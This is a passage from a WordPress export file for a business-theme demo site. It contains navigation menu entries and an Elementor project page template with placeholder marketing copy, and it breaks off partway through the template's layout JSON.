		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz/761/</link>
		<pubDate>Thu, 10 Sep 2020 09:27:00 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=761</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>761</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 09:27:00]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 09:27:00]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[761]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>29</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[0]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[455]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz/762/</link>
		<pubDate>Thu, 10 Sep 2020 09:26:59 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=762</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>762</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 09:26:59]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 09:26:59]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[762]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>9</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[363]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[624]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz/763/</link>
		<pubDate>Thu, 10 Sep 2020 09:27:00 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=763</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>763</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 09:27:00]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 09:27:00]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[763]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>11</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[363]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[566]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz/764/</link>
		<pubDate>Thu, 10 Sep 2020 09:26:59 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=764</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>764</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 09:26:59]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 09:26:59]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[764]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>6</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[363]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[529]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz/765/</link>
		<pubDate>Thu, 10 Sep 2020 09:26:59 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=765</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>765</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 09:26:59]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 09:26:59]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[765]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>7</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[363]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[690]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz/766/</link>
		<pubDate>Thu, 10 Sep 2020 09:26:59 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=766</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>766</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 09:26:59]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 09:26:59]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[766]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>690</wp:post_parent>
		<wp:menu_order>8</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[363]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[711]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title></title>
		<link>http://wpdemo.archiwp.com/maxbizz/767/</link>
		<pubDate>Thu, 10 Sep 2020 09:26:59 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=767</guid>
		<description></description>
		<content:encoded><![CDATA[ ]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>767</wp:post_id>
		<wp:post_date><![CDATA[2020-09-10 09:26:59]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-10 09:26:59]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[767]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>10</wp:menu_order>
		<wp:post_type><![CDATA[nav_menu_item]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="nav_menu" nicename="main-menu"><![CDATA[Main Menu]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[post_type]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_menu_item_parent]]></wp:meta_key>
		<wp:meta_value><![CDATA[363]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object_id]]></wp:meta_key>
		<wp:meta_value><![CDATA[471]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_object]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_target]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_classes]]></wp:meta_key>
		<wp:meta_value><![CDATA[a:1:{i:0;s:0:"";}]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_xfn]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_menu_item_url]]></wp:meta_key>
		<wp:meta_value><![CDATA[]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>MB Project Single</title>
		<link>http://wpdemo.archiwp.com/maxbizz/?elementor_library=mb-project-single</link>
		<pubDate>Tue, 29 Sep 2020 08:52:15 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?elementor_library=mb-project-single</guid>
		<description></description>
		<content:encoded><![CDATA[<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands.</p>		
			<h6>Client:</h6>		
		<p>BusinessMax</p>		
			<h6>Website:</h6>		
		<p>businessmax.com</p>		
			<h6>Date:</h6>		
		<p>November 22, 2020</p>		
			<h6>Category:</h6>		
		<p>Marketing/Finance</p>		
										<img width="1174" height="620" src="https://maxbizz.s3.amazonaws.com/images/project-details.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/project-details.jpg 1174w, https://maxbizz.s3.amazonaws.com/images/project-details-300x158.jpg 300w, https://maxbizz.s3.amazonaws.com/images/project-details-1024x541.jpg 1024w, https://maxbizz.s3.amazonaws.com/images/project-details-768x406.jpg 768w" sizes="(max-width: 1174px) 100vw, 1174px" />											
			<h5>01. Сhallenge</h5>		
		<p>Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					<ul>
							<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										the organization is just beginning to operate in the market, implementing some projects. Our team of global experts help you achieve sustainable, organic growth by focusing on three critical building blocks.
									</li>
								<li>
							<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 29.107 29.107" style="enable-background:new 0 0 29.107 29.107;" xml:space="preserve">
<g>
	<g id="c147_full_moon">
		<g>
			<path d="M14.554,0C6.561,0,0,6.562,0,14.552c0,7.996,6.561,14.555,14.554,14.555c7.996,0,14.553-6.559,14.553-14.555     C29.106,6.562,22.55,0,14.554,0z"></path>
		</g>
	</g>
	<g id="Capa_1_14_">
	</g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
<g>
</g>
</svg>						
										there are projects that require temporary expansion of the marketing department. Customer-focused businesses build a virtuous cycle we call the "customer wheel." We help you at every stage of growth, developing custom solutions and collaborating with all levels of your organization.
									</li>
						</ul>
			<h5>02. Solutions</h5>		
		<p>What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology. Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape.</p>		
					75				
			<h6>marketing analysis</h6>		
					65				
			<h6>business innovation</h6>		
					90				
			<h6>finance strategy</h6>		
					45				
			<h6>corporate management</h6>		
			<h5>03. Results</h5>		
		<p>A utility company was steadily losing customers as consumers gained the right to select their energy supplier. To boost loyalty, we helped the company transform its culture to be intensely customer-focused.</p><p>We helped a global technology company that specializes in software to reduce the complexity and mystery around their pricing strategy. The work helped generate millions more in income each year. We helped a multibillion dollar global technology giant simplify structures, save millions in costs, and create better-prepared sellers with more time for customers. We helped a multibillion dollar global technology giant simplify organizational structures, save millions in costs.</p>		
										<img width="606" height="342" src="https://maxbizz.s3.amazonaws.com/images/chart-project.png" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/chart-project.png 606w, https://maxbizz.s3.amazonaws.com/images/chart-project-300x169.png 300w" sizes="(max-width: 606px) 100vw, 606px" />											
					<a target="_blank" rel="noopener noreferrer">
						Twitter
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Facebook-f
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Google-plus-g
											</a>
					<a target="_blank" rel="noopener noreferrer">
						Pinterest-p
											</a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>1050</wp:post_id>
		<wp:post_date><![CDATA[2020-09-29 08:52:15]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-29 08:52:15]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[mb-project-single]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[elementor_library]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="elementor_library_type" nicename="page"><![CDATA[page]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.10]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"4f485cbd","elType":"section","settings":{"gap":"extended","content_position":"bottom","structure":"20","padding":{"unit":"px","top":"80","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"16cddd65","elType":"column","settings":{"_column_size":50,"_inline_size":65,"_inline_size_tablet":100},"elements":[{"id":"3a4e789","elType":"widget","settings":{"editor":"<p>Not so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it\u2019s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, content and partners; and a step change in speed and ways of working that has punches flying at incumbent consumer products companies. Within the span of most executives\u2019 careers, advances in technology have reshaped how consumers engage with brands.<\/p>","drop_cap":"yes","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":false},{"id":"1ec5aac2","elType":"column","settings":{"_column_size":50,"_inline_size":35,"_inline_size_tablet":100},"elements":[{"id":"2b13e690","elType":"section","settings":{"gap":"extended","structure":"20","background_background":"classic","background_color":"#F5F5F5","border_radius":{"unit":"px","top":"5","right":"5","bottom":"5","left":"5","isLinked":true},"padding":{"unit":"px","top":"35","right":"20","bottom":"35","left":"20","isLinked":false},"padding_mobile":{"unit":"px","top":"15","right":"15","bottom":"15","left":"15","isLinked":true}},"elements":[{"id":"339d13f0","elType":"column","settings":{"_column_size":50,"_inline_size":47.8130000000000023874235921539366245269775390625,"_inline_size_mobile":100},"elements":[{"id":"5889fd7c","elType":"widget","settings":{"title":"Client:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"10dcad63","elType":"widget","settings":{"editor":"<p>BusinessMax<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"28","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"53d5271c","elType":"widget","settings":{"title":"Website:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"5dcaf7e2","elType":"widget","settings":{"editor":"<p>businessmax.com<\/p>","_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"4b3ecf7a","elType":"column","settings":{"_column_size":50,"_inline_size":52.1820000000000021600499167107045650482177734375,"_inline_size_mobile":100},"elements":[{"id":"12cac18e","elType":"widget","settings":{"title":"Date:","header_size":"h6","title_color":"#1B1D21","typography_typography":"custom","typography_font_family":"Inter","typography_font_size":{"unit":"px","size":16,"sizes":[]},"typography_font_weight":"bold","_padding":{"unit":"px","top":"0","right":"0","bottom":"3","left":"0","isLinked":false}},"elements":[],"widgetType":"heading"},{"id":"6e41b761","elType":"widget","settings":{"editor":"<p>November 22, 